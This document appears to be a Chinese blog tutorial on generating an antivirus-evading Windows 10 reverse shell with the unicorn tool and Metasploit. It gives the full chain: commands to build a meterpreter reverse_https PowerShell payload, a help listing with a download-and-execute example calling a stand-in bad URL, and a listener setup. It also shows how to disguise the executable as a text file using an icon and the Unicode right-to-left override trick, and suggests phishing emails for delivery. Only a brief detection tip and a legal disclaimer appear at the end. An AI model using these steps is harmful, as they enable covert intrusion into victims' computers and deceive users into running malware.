实战: unicorn生成免杀木马,绕过win10防火墙和windows defender

  • 简介
    • 原理
    • 步骤
    • 攻击
    • 总结


随着操作系统的安全等级越来越高,对能免杀,无视防火墙的木马需求也越来越高,目前市面上主流工具有WinPaylods, Veil v3和TheFatRat,这里介绍一个开源工具unicorn。原文地址:


通过开源工具生成MSF payload,伪装成TXT在目标机上执行。



sudo apt-get remove metasploit-framework


curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall


git clone https://github.com/trustedsec/unicorn
cd unicorn/
./unicorn.py --help-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris GatesHappy Magic Unicorns.Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help


./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>


[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...,///,//___   /|   |//`__/\_ --(/|___/-/\|\_-\___ __-_`- /-/ \.|\_-___,-\_____--/_)' ) \\ -_ /     __ \( `( __`\|`\__|      |\)\ ) /(/|,._____.,            ',--//-|      \  |  '   //     __. \,          / /,---|       \       // /    _. \  \        `/`_/ _,'        |     ||  | ( (  \   |      ,/\'__/'/          |     ||  \  \`--, `_/_------______/           \(   )/| | \  \_. \,                            \___/\| |  \_   \  \                                 \\ \    \_ \   \   /                             \\ \  \._  \__ \_|       |                       \\ \___  \      \       |                        \\__ \__ \  \_ |       \                         ||  \_____ \  ____      |                        || \  \__ ---' .__\     |        |               |\  \__ ---   /   )     |        \              /\   \____/ / ()(      \          `---_       /|\__________/(,--__    \_________.    |    ./ ||     \ \  `---_\--,           \   \_,./   ||      \  \_ ` \    /`---_______-\   \\    /\      \.___,`|   /              \   \\   \\     |  \_ \|   \              (   |:    |\    \      \    |             /  / |    ;\    \      \    \          ( `_'   \  |\.   \      \.   \          `__/   |  |\   \       \.  \                |  |\   \        \  \               (  )\   |        \  |              |  ||  \         \ \              I  `( __;        ( _;            ('-_';|___\        \___:            \___:aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDaveHappy Magic Unicorns.[********************************************************************************************************]-----POWERSHELL ATTACK INSTRUCTIONS----Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains  all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word  doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and  scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.Note that you will need to have a listener enabled in order to capture the attack.[*******************************************************************************************************][*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.

会在unicorn目录下生成两个文件: unicorn.rc和powershell_attack.txt,后者是我们需要在目标机上运行的。


git clone 'https://github.com/B00merang-Project/Windows-10-Icons'

这里选择Windows-10-Icons/256x256/mimetypes/ 下的text-x-generic.png

保存为windows 64位invisible的text.exe,然后伪装文件后缀名。
先把文件名改为texttxt.exe, 然后去https://unicode-table.com/en/202E/复制倒写unicode,文件名就变成了textexe.txt,但实际是一个可执行文件,这招能骗过开启文件后缀名显示的目标机用户。



sudo msfconsole -r unicorn/unicorn.rc



成功建立session,这时候注意目标机防火墙全开,windows defender开:

看到了吧,但是仍然可以无视~~,选择sessions -i 1和目标机建立连接:


load stdapi




这种办法仍然需要目标机打开你的文件, 因此实际可以用钓鱼邮件的形式远程引诱目标机打开txt或者是图片。这种办法还是有明显的防范措施的,即留心文件后缀名前的那行字,如果是exe/bat那就要格外小心。最后提醒读者遵纪守法,本文对所产生后果概不负责。

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